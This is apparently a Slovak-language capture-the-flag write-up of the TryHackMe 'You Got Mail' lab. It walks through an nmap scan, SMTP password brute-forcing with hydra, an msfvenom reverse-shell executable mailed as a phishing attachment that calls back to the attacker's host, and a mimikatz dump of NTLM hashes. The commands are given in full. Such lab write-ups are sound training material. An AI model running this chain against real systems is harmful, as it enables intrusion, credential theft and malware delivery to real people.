Príspevok

TryHackMe - You Got Mail (Máš poštu)

Windows mašiny sú tiež fajn

TryHackMe - You Got Mail (Máš poštu)

Introduction

Pozdvihnime náš level na trochu vyššiu úroveň a skúsme Medium miestnosť. Predpokladám, že sa máme dostať na webovú stránku brownbrick.co a získať prístup cez e-mailovú adresu.

Tryhackme Room Link

Nmap

Začnime nmap skenom:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
nmap -T4 -n -sC -sV -Pn -p- 10.10.148.225
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp   open  pop3          hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
|_imap-capabilities: OK IMAP4rev1 IMAP4 completed CHILDREN SORT RIGHTS=texkA0001 ACL CAPABILITY IDLE QUOTA NAMESPACE
445/tcp   open  microsoft-ds?
587/tcp   open  smtp          hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-18T19:57:00+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=BRICK-MAIL
| Not valid before: 2025-02-17T19:53:26
|_Not valid after:  2025-08-19T19:53:26
| rdp-ntlm-info: 
|   Target_Name: BRICK-MAIL
|   NetBIOS_Domain_Name: BRICK-MAIL
|   NetBIOS_Computer_Name: BRICK-MAIL
|   DNS_Domain_Name: BRICK-MAIL
|   DNS_Computer_Name: BRICK-MAIL
|   Product_Version: 10.0.17763
|_  System_Time: 2025-02-18T19:56:52+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-02-18T19:56:52
|_  start_date: N/A

Veľa otvorených portov s poväčšine Microsoft službami

Prieskup

Spolu s otvorenými portami sme dostali aj web https://brownbrick.co, takže sa poďme pozrieť

Prejdime priamo na stránku tímu a môžeme vidieť e-mailové adresy

Flag

Spravme si zoznam, aby sme mohli neskôr Brute-forcom tie maily skúsiť

1
2
3
4
5
6
oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co

A môžeme si vytvoriť zoznam hesiel pomocou nástroja cewl z celej webovej stránky

1
$ cewl --lowercase https://brownbrick.co/ > pass.txt

Brute Force

Dobre, keďže máme zoznam používateľských mien a hesiel, skúsme Brute-forcnúť prístup cez port SMTP 587/tcp, keďže bol otvorený Použijeme hydra, pretože je to najjednoduchšie

1
hydra -L team.txt -P pass.txt 10.10.148.225 smtp -s 587

A máme hit

1
2
[587][smtp] host: 10.10.148.225   login: lhedvig@brownbrick.co   password: bricks

Keďže sú tieto prihlasovacie údaje valídne, môžeme ich použiť na odosielanie e-mailov ostatným členom tímu pomocou metasploit(msvenom) Vytvorme spustiteľný reverzný shell, aby sme maily mohli poslať ostatným členom tímu

1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.122 LPORT=1337 -f exe -o shell.exe

Otvorme si port 1337 a pošlime e-mail s priloženým súborom shell.exe

1
2
nc -lvnp 1337                                                                             
listening on [any] 1337 ...

A pošlime e-mail prvému členovi tímu:

1
2
sendemail -f "lhedvig@brownbrick.co" -t "oaurelius@brownbrick.co" -u "test" -m "test" -a shell.exe -s 10.10.148.225:25 -xu "lhedvig@brownbrick.co" -xp "bricks"
Feb 18 21:22:08 kali sendemail[23334]: Email was sent successfully!

A vidíme, že používateľ už klikol na našu prílohu!

1
2
3
4
5
6
7
connect to [10.11.75.122] from (UNKNOWN) [10.10.148.225] 49759
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Mail\Attachments>
whoami
brick-mail\wrohit

Vlajka užívateľa

Vlajka je na pracovnej ploche nášho používateľa, takže poďme na to

User Flag

Získanie hesiel

Takže na to získanie hesiel z windowsu použijeme nástroj mimikatz Môžeme si tak vypísať hashe zo stroja so systémom Windows, takže najprv musíme získať aplikáciu mimikatz.exe do nášho cieľového počítača

Spustíme http server na našej mašine, kde je mimikatz.exe a spustíme si lokálny http server pomocou pythonu

1
2
python3 -m http.server 80                                                                  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Môžme si stiahnuť súbor z našej mašiny

1
2
3
4
curl http://10.11.75.122/mimikatz.exe -o mimikatz.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1323k  100 1323k    0     0  1323k      0  0:00:01 --:--:--  0:00:01 3393k

Teraz môžeme použiť mimikatz.exe na výpis hashov

1
2
3
4
5
6
7
8
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

Potrebujeme si zvýšiť privilégiá pomocou token::elevate

1
2
mimikatz # privilege::debug
Privilege '20' OK

A vypíšeme hashe

1
2
3
4
mimikatz # lsadump::sam
RID  : 000003f6 (1014)
User : wrohit
  Hash NTLM: 8458995f1d0a4b0c107fb8e23362c814

Teraz prelomíme hash pomocou crackstation.net

Root Flag

A heslo na hMail sa nachádza

1
2
C:\Program Files (x86)\hMailServer\Bin>type hMailServer.INI
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99

Opäť Crackstation a máme hotovo

hmail


Tento príspevok je licencovaný pod CC BY 4.0 autorom.